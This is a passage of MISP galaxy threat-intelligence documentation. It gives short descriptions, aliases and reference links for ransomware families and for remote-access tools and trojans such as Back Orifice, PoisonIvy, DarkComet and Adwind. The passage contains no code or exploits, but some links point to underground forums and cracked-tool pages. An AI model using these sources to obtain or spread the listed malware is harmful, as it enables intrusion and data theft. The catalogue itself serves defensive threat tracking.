<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/">https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flotera_ransomware"><a class="anchor" href="#_flotera_ransomware"></a><a class="link" href="#_flotera_ransomware">Flotera Ransomware</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2166. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/">https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_black_ruby"><a class="anchor" href="#_black_ruby"></a><a class="link" href="#_black_ruby">Black Ruby</a></h3>
<div class="paragraph">
<p>A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2167. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/">https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_whiterose"><a class="anchor" href="#_whiterose"></a><a class="link" href="#_whiterose">WhiteRose</a></h3>
<div class="paragraph">
<p>A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2168. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/">https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_rat"><a class="anchor" href="#_rat"></a><a class="link" href="#_rat">RAT</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
RAT is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/rat.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_teamviewer"><a class="anchor" href="#_teamviewer"></a><a class="link" href="#_teamviewer">TeamViewer</a></h3>
<div class="paragraph">
<p>TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2169. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.teamviewer.com">https://www.teamviewer.com</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jaderat"><a class="anchor" href="#_jaderat"></a><a class="link" href="#_jaderat">JadeRAT</a></h3>
<div class="paragraph">
<p>JadeRAT is just one example of numerous mobile surveillanceware families we&#8217;ve seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2170. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/mobile-threat-jaderat">https://blog.lookout.com/mobile-threat-jaderat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_back_orifice"><a class="anchor" href="#_back_orifice"></a><a class="link" href="#_back_orifice">Back Orifice</a></h3>
<div class="paragraph">
<p>Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.</p>
</div>
<div class="paragraph">
<p>Back Orifice is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BO</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2171. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cultdeadcow.com/tools/bo.html">http://www.cultdeadcow.com/tools/bo.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/avcenter/warn/backorifice.html">http://www.symantec.com/avcenter/warn/backorifice.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netbus"><a class="anchor" href="#_netbus"></a><a class="link" href="#_netbus">Netbus</a></h3>
<div class="paragraph">
<p>NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.</p>
</div>
<div class="paragraph">
<p>Netbus is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NetBus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2172. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/avcenter/warn/backorifice.html">http://www.symantec.com/avcenter/warn/backorifice.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/netbus.shtml">https://www.f-secure.com/v-descs/netbus.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poisonivy_2"><a class="anchor" href="#_poisonivy_2"></a><a class="link" href="#_poisonivy_2">PoisonIvy</a></h3>
<div class="paragraph">
<p>Poison Ivy is a RAT which was freely available and first released in 2005.</p>
</div>
<div class="paragraph">
<p>PoisonIvy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Poison Ivy</p>
</li>
<li>
<p>Backdoor.Win32.PoisonIvy</p>
</li>
<li>
<p>Gen:Trojan.Heur.PT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2173. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml">https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sub7"><a class="anchor" href="#_sub7"></a><a class="link" href="#_sub7">Sub7</a></h3>
<div class="paragraph">
<p>Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.</p>
</div>
<div class="paragraph">
<p>Sub7 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SubSeven</p>
</li>
<li>
<p>Sub7Server</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2174. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2001-020114-5445-99">https://www.symantec.com/security_response/writeup.jsp?docid=2001-020114-5445-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beast_trojan"><a class="anchor" href="#_beast_trojan"></a><a class="link" href="#_beast_trojan">Beast Trojan</a></h3>
<div class="paragraph">
<p>Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2175. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Beast_(Trojan_horse)">https://en.wikipedia.org/wiki/Beast_(Trojan_horse)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bifrost"><a class="anchor" href="#_bifrost"></a><a class="link" href="#_bifrost">Bifrost</a></h3>
<div class="paragraph">
<p>Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2176. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.revolvy.com/main/index.php?s=Bifrost%20(trojan%20horse)&amp;item_type=topic">https://www.revolvy.com/main/index.php?s=Bifrost%20(trojan%20horse)&amp;item_type=topic</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware-info.blogspot.lu/2008/10/bifrost-trojan.html">http://malware-info.blogspot.lu/2008/10/bifrost-trojan.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackshades"><a class="anchor" href="#_blackshades"></a><a class="link" href="#_blackshades">Blackshades</a></h3>
<div class="paragraph">
<p>Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers using Microsoft Windows -based operating systems.[2] According to US officials, over 500,000 computer systems have been infected worldwide with the software.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2177. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/">https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkcomet"><a class="anchor" href="#_darkcomet"></a><a class="link" href="#_darkcomet">DarkComet</a></h3>
<div class="paragraph">
<p>DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.</p>
</div>
<div class="paragraph">
<p>DarkComet is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dark Comet</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2178. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/">https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.cisco.com/security/talos/darkkomet-rat-spam">https://blogs.cisco.com/security/talos/darkkomet-rat-spam</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lanfiltrator"><a class="anchor" href="#_lanfiltrator"></a><a class="link" href="#_lanfiltrator">Lanfiltrator</a></h3>
<div class="paragraph">
<p>Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2179. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2002-121116-0350-99">https://www.symantec.com/security_response/writeup.jsp?docid=2002-121116-0350-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_win32_hsidir"><a class="anchor" href="#_win32_hsidir"></a><a class="link" href="#_win32_hsidir">Win32.HsIdir</a></h3>
<div class="paragraph">
<p>Win32.HsIdir is an advanced remote administrator tool systems was done by the original author HS32-Idir, it is the development of the release made since 2006 Copyright © 2006-2010 HS32-Idir.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2180. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://lexmarket.su/thread-27692.html">http://lexmarket.su/thread-27692.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nulled.to/topic/129749-win32hsidir-rat/">https://www.nulled.to/topic/129749-win32hsidir-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_optix_pro"><a class="anchor" href="#_optix_pro"></a><a class="link" href="#_optix_pro">Optix Pro</a></h3>
<div class="paragraph">
<p>Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2181. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Optix_Pro">https://en.wikipedia.org/wiki/Optix_Pro</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2002-090416-0521-99">https://www.symantec.com/security_response/writeup.jsp?docid=2002-090416-0521-99</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20208">https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20208</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_back_orifice_2000"><a class="anchor" href="#_back_orifice_2000"></a><a class="link" href="#_back_orifice_2000">Back Orifice 2000</a></h3>
<div class="paragraph">
<p>Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker&#8217;s remote access tool). It was created by the Cult of Dead Cow hackers group in July 1999. Originally the BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with CIH virus, so the people who got that CD might get infected and spread not only the compiled backdoor, but also the CIH virus.</p>
</div>
<div class="paragraph">
<p>Back Orifice 2000 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BO2k</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2182. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Back_Orifice_2000">https://en.wikipedia.org/wiki/Back_Orifice_2000</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=10229">https://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=10229</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2000-121814-5417-99">https://www.symantec.com/security_response/writeup.jsp?docid=2000-121814-5417-99</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/bo2k.shtml">https://www.f-secure.com/v-descs/bo2k.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_realvnc"><a class="anchor" href="#_realvnc"></a><a class="link" href="#_realvnc">RealVNC</a></h3>
<div class="paragraph">
<p>The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another</p>
</div>
<div class="paragraph">
<p>RealVNC is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>VNC Connect</p>
</li>
<li>
<p>VNC Viewer</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2183. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.realvnc.com/">https://www.realvnc.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwind_rat"><a class="anchor" href="#_adwind_rat"></a><a class="link" href="#_adwind_rat">Adwind RAT</a></h3>
<div class="paragraph">
<p>Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.</p>
</div>
<div class="paragraph">
<p>Adwind RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>UNRECOM</p>
</li>
<li>
<p>UNiversal REmote COntrol Multi-Platform</p>
</li>
<li>
<p>Frutas</p>
</li>
<li>
<p>AlienSpy</p>
</li>
<li>
<p>Unrecom</p>
</li>
<li>
<p>Jsocket</p>
</li>
<li>
<p>JBifrost</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2184. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf">https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml">https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat">https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_albertino_advanced_rat"><a class="anchor" href="#_albertino_advanced_rat"></a><a class="link" href="#_albertino_advanced_rat">Albertino Advanced RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2185. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virustotal.com/en/file/b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73/analysis/1359376345/">https://www.virustotal.com/en/file/b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73/analysis/1359376345/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arcom"><a class="anchor" href="#_arcom"></a><a class="link" href="#_arcom">Arcom</a></h3>
<div class="paragraph">
<p>The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2186. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/">http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blacknix"><a class="anchor" href="#_blacknix"></a><a class="link" href="#_blacknix">BlackNix</a></h3>
<div class="paragraph">
<p>BlackNix rat is a rat coded in delphi.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2187. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-18123?tid=18123&amp;&amp;pq=1">https://leakforums.net/thread-18123?tid=18123&amp;&amp;pq=1</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blue_banana"><a class="anchor" href="#_blue_banana"></a><a class="link" href="#_blue_banana">Blue Banana</a></h3>
<div class="paragraph">
<p>Blue Banana is a RAT (Remote Administration Tool) created purely in Java</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2188. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-123872">https://leakforums.net/thread-123872</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://techanarchy.net/2014/02/blue-banana-rat-config/">https://techanarchy.net/2014/02/blue-banana-rat-config/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bozok"><a class="anchor" href="#_bozok"></a><a class="link" href="#_bozok">Bozok</a></h3>
<div class="paragraph">
<p>Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2189. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html">https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clientmesh"><a class="anchor" href="#_clientmesh"></a><a class="link" href="#_clientmesh">ClientMesh</a></h3>
<div class="paragraph">
<p>ClientMesh is a Remote Administration Application yhich allows a user to control a number of client PCs from around the world.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2190. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sinister.ly/Thread-ClientMesh-RAT-In-Built-FUD-Crypter-Stable-DDoSer-No-PortForwading-40-Lifetime">https://sinister.ly/Thread-ClientMesh-RAT-In-Built-FUD-Crypter-Stable-DDoSer-No-PortForwading-40-Lifetime</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.yakuza112.org/2012/clientmesh-rat-v5-cracked-clean/">https://blog.yakuza112.org/2012/clientmesh-rat-v5-cracked-clean/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cybergate"><a class="anchor" href="#_cybergate"></a><a class="link" href="#_cybergate">CyberGate</a></h3>
<div class="paragraph">
<p>CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim&#8217;s passwords and can also get the screen shots of his computer&#8217;s screen.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2191. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html">http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-e-mails-hint-corporate-hacking-conspiracy/">http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-e-mails-hint-corporate-hacking-conspiracy/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dark_ddoser"><a class="anchor" href="#_dark_ddoser"></a><a class="link" href="#_dark_ddoser">Dark DDoSeR</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2192. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html">http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkrat"><a class="anchor" href="#_darkrat"></a><a class="link" href="#_darkrat">DarkRat</a></h3>
<div class="paragraph">
<p>In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as Dark RAT a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.</p>
</div>
<div class="paragraph">
<p>DarkRat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DarkRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2193. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
